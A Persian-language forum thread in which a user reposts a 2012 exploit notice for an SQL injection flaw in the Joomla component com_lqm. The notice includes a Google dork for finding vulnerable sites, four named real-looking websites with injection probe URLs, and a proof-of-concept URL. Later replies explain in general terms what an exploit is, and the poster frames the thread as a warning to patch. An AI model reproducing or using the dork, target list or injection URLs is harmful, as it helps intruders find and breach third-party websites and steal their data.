اکسپلویت com_lqm جوملا

[Phantom Wolf مهمان]

سلام خدمت همگی.

اینم یه اکسپلویت دیگه از جوملا

تاریخ:10/04/2012

شرح:

##################################################

# Exploit Title: joomla component (com_lqm) SQL injection Vulnerability

#Developer: Not Registered

# Date: 10/04/2012

# Author: xDarkSton3x

# E-mail : xdarkston3x@msn.com

# Category: webapps

# Google dork: inurl:"index.php?option=com_lqm"

# Example Sites :

http://www.chasehost.net/rcc/index.php?option=com_lqm&query=68&name=jsession_test&Itemid=%27

http://www.embaperu.ch/index.php?option=com_lqm&8a60248c75245fcd51919a0ced0df5b1=1&task=showResults&query=20&lqm_Year=%s&&Itemid=%27

http://maprunner.org.uk/index.php?option=com_lqm&8a60248c75245fcd51919a0ced0df5b1=1&task=showResults&query=20&lqm_Year=%s&&Itemid=%27

http://www.madisoncountyky.us//index.php?option=com_lqm&query=68&name=jsession_test&Itemid='

##################################################

[~]Exploit/p0c :

http://site.com/index.php?option=com_lqm&query=68&name=jsession_test&Itemid=[sqli]

Greetz [ Rs4 - B4nz0k - FailRoot - FailSoft - W4rn1ng] - [ Malandrines Team - DiosdelaRed.Com - RemoteExecution ] [ Dedalo - Maztor ]

---

مراقب باشید

بایgift

[Mahboobe.Maleki 53]

درباره اکسپلویت بیشتر توضیح میدید؟ (منظورم خود اکسپلویت هست نه اکسپلویتی که گذاشتید) و اگه لازمه یه تاپیک جداگانه باز کنید برای توضیحاتش لطفا

[Pooyan Afzali 41]

درباره اکسپلویت بیشتر توضیح میدید؟ (منظورم خود اکسپلویت هست نه اکسپلویتی که گذاشتید) و اگه لازمه یه تاپیک جداگانه باز کنید برای توضیحاتش لطفا

درود

اسکپلویت یک کد نوشته شده معمولا به زبان پرل یا پیتون هست که بر اساس وجود یک باگ در یک سیستم یا سایت ایجاد میشه

در واقع اول یک باگ پیش میاد و بعد هکر میاد برای استفاده از اون باگ که بتونه هدفشو هک کنه بر اساس اون میاد یه راه ورود به هدفش ایجاد میکنه که میگیم اکسپلویت

اکسپلویت راه ورود به هدف بر اساس باگ ایجاد شده هست

[Phantom Wolf مهمان]

و حالا اینم راه نفوذ به جوملا از طریق com_lqm است به همین دلیل این پست رو زدم که در صورت استفاده از این برنامه سریعا اون رو برطرف کنید:128fs318181: